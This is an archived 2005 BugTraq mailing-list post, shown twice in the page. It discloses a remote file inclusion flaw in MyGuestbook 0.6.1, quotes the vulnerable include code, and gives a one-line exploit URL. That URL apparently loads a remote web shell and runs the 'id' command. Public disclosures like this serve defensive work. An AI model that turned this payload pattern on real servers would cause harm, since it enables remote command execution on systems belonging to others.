BugTraq
Back to list
|
Post reply
Remote File Inclusion in MyGuestbook
Sep 14 2005 11:50PM
rod hedor (rodhedor hotmail com)
(1 replies)
Remote File Inclusion in MyGuestbook
Date: 10/07/2005
Severity: High
version: 0.6.1
The bug reside in form.inc.php3
The Vulnerable Code
if ($show < 1) {
include ("form.inc.php3");
}
Exploit :
http://server/Guestbook/form.inc.ph...cmd.gif?&cmd=id
Discovery by RoDheDoR
L-G-H Team
http://www.lezr.com
Best Regards
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
[ reply ]
Re: Remote File Inclusion in MyGuestbook
Sep 23 2005 08:00AM
security curmudgeon (jericho attrition org)
Privacy Statement
Copyright 2010, SecurityFocus
Remote File Inclusion in MyGuestbook
Date: 10/07/2005
Severity: High
version: 0.6.1
The bug reside in form.inc.php3
The Vulnerable Code
if ($show < 1) {
include ("form.inc.php3");
}
Exploit :
http://server/Guestbook/form.inc.ph...cmd.gif?&cmd=id
Discovery by RoDheDoR
L-G-H Team
http://www.lezr.com
Best Regards
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
[ reply ]